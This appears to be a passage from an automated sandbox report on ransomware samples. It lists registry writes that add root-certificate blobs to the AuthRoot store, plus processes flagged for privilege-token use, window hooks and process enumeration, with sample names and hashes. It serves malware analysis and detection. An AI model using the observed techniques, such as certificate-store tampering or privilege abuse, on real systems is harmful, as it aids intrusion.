description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 y_installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd y_installer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 1760 powershell.exe 1760 powershell.exe 1760 powershell.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3256 7zFM.exe 2004 taskmgr.exe 2316 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3256 7zFM.exe Token: 35 3256 7zFM.exe Token: SeSecurityPrivilege 3256 7zFM.exe Token: SeDebugPrivilege 2772 taskmgr.exe Token: SeSystemProfilePrivilege 2772 taskmgr.exe Token: SeCreateGlobalPrivilege 2772 taskmgr.exe Token: SeDebugPrivilege 2004 taskmgr.exe Token: SeSystemProfilePrivilege 2004 taskmgr.exe Token: SeCreateGlobalPrivilege 2004 taskmgr.exe Token: 33 2772 taskmgr.exe Token: SeIncBasePriorityPrivilege 2772 taskmgr.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 3112 HEUR-Trojan-Ransom.MSIL.Blocker.gen-186d9afa5f922ed9b4cb93853bd15496aeaf37d212f479c049fbd74c40d0b8af.exe Token: SeShutdownPrivilege 1164 explorer.exe Token: SeCreatePagefilePrivilege 1164 explorer.exe Token: SeShutdownPrivilege 1164 explorer.exe Token: SeCreatePagefilePrivilege 1164 explorer.exe Token: SeDebugPrivilege 4200 Trojan-Ransom.Win32.Blocker.mvwo-8f4df1b11998017853ed5d0f009f461275cdd73f9c274d865fd11c36f6280118.exe Token: SeDebugPrivilege 3464 taskkill.exe Token: SeDebugPrivilege 3076 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeDebugPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeLoadDriverPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeCreateGlobalPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: 33 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeSecurityPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeTakeOwnershipPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeManageVolumePrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeBackupPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeCreatePagefilePrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeShutdownPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeRestorePrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: 33 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeIncBasePriorityPrivilege 4172 UDS-Trojan-Ransom.Win32.Crypmod.xvk-338dd780ea34a04619568845e036d97ff23758c54d65704c81b37a59c66275e7.exe Token: SeDebugPrivilege 4000 Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Token: SeDebugPrivilege 4000 Trojan-Ransom.Win32.Vega.ap-b7f96fbb9844cac5c7f4ec966683f3564bbb9a2f453927e1c579dcb0154f5f83.exe Token: SeManageVolumePrivilege 4200 svchost.exe Token: SeDebugPrivilege 1556 Trojan-Ransom.MSIL.Blocker.aw-f4ca0ba460f6423e6168c27d45dc590bbd79774be4aee3804e0b5ec961ab97fa.exe Token: SeIncreaseQuotaPrivilege 5948 WMIC.exe Token: SeSecurityPrivilege 5948 WMIC.exe Token: SeTakeOwnershipPrivilege 5948 WMIC.exe Token: SeLoadDriverPrivilege 5948 WMIC.exe Token: SeSystemProfilePrivilege 5948 WMIC.exe Token: SeSystemtimePrivilege 5948 WMIC.exe Token: SeProfSingleProcessPrivilege 5948 WMIC.exe Token: SeIncBasePriorityPrivilege 5948 WMIC.exe Token: SeCreatePagefilePrivilege 5948 WMIC.exe Token: SeBackupPrivilege 5948 WMIC.exe Token: SeRestorePrivilege 5948 WMIC.exe Token: SeShutdownPrivilege 5948 WMIC.exe Token: SeDebugPrivilege 5948 WMIC.exe Token: SeSystemEnvironmentPrivilege 5948 WMIC.exe Token: SeRemoteShutdownPrivilege 5948 WMIC.exe Token: SeUndockPrivilege 5948 WMIC.exe Token: SeManageVolumePrivilege 5948 WMIC.exe Token: 33 5948 WMIC.exe Token: 34 5948 WMIC.exe Token: 35 5948 WMIC.exe Token: 36 5948 WMIC.exe Token: SeIncreaseQuotaPrivilege 5948 WMIC.exe Token: SeSecurityPrivilege 5948 WMIC.exe Token: SeTakeOwnershipPrivilege 5948 WMIC.exe Token: SeLoadDriverPrivilege 5948 WMIC.exe Token: SeSystemProfilePrivilege 5948 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3256 7zFM.exe 3256 7zFM.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2772 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe 2004 taskmgr.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3672 Trojan-Ransom.Win32.Gimemo.besk-bcc15645592a6add5c91d3d097e63e8775b949be72de33fd7b06c5197c9a40fe.exe 5964 Fast.exe 5964 Fast.exe 4624 StartMenuExperienceHost.exe 5384 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
